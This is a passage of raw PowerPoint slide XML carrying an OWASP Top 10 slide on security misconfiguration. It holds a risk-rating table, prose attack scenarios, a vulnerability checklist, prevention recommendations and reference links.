                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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3" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A4</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="443461127"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948521"/>
          <a:ext cx="6858000" cy="2536359"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="651679">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r>
              <a:tr h="3824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rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>COMMON</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Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>EASY</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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODERATE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Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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451035">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anonymous external attackers as well as authorized users that may attempt to compromise the system. Also consider insiders wanting to disguise their actions.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, frameworks, and custom code. Developers and system administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, misconfigurations, use of default accounts, unnecessary services, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Such flaws frequently give attackers unauthorized access to some system data or functionality</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Occasionally, such flaws result in a complete system compromise.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The system could be completely compromised without you knowing it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. All of your data could be stolen or modified slowly over time. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Recovery costs could be expensive.</a:t>
                      </a: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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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1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Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: The app server admin console is automatically installed and not removed. Default accounts aren’t changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Directory listing is not disabled on your web server. An attacker discovers they can simply list directories to find any file. The attacker finds and downloads all your compiled Java classes, which they decompile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and reverse </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>engineer to get all your custom code. Attacker then finds a serious access control flaw in your application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: App server comes with sample applications that are not removed from your production server. These sample applications have well known security flaws attackers can use to compromise your server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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Am I Vulnerable to Attack?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is your application missing the proper security hardening across any part of the application stack? Including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Is any of your software out of date? This software includes the OS, Web/App Server, DBMS, applications, APIs, and all components and libraries (see 2017-A9).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are any unnecessary features enabled or installed (e.g., ports, services, pages, accounts, privileges)?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are default accounts and their passwords still enabled and unchanged?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does your error handling reveal stack traces or other overly informative error messages to users?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="201168" indent="-201168">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Are the security settings in your application servers, application frameworks (e.g., Struts, Spring, ASP.NET), libraries, databases, etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> not set to secure values?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Without a concerted, repeatable application security configuration process, systems are at a higher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>risk.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId4"/>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5"/>
              </a:rPr>
              <a:t>OWASP Development Guide: Chapter on Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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6"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide: Chapter on Error Handling</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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9"/>
              </a:rPr>
              <a:t>OWASP Top 10 2004 - Insecure Configuration Management </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional requirements in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>ASVS requirements areas for Security Configuration (V11 and V19)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId11"/>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12"/>
              </a:rPr>
              <a:t>NIST Guide to General Server Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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13"/>
              </a:rPr>
              <a:t>CWE Entry 2 on Environmental Security Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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14"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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How Do I Prevent This?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The primary recommendations are to establish all of the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>different passwords used in each environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>). This process should be automated to minimize the effort required to setup a new secure environment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A process for keeping abreast of and deploying all new software updates and patches in a timely manner to each deployed environment. This process needs to include all components and libraries as well (see 2017-A9).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A strong application architecture that provides effective, secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>separation </a:t>
            </a:r>
            <a:r>
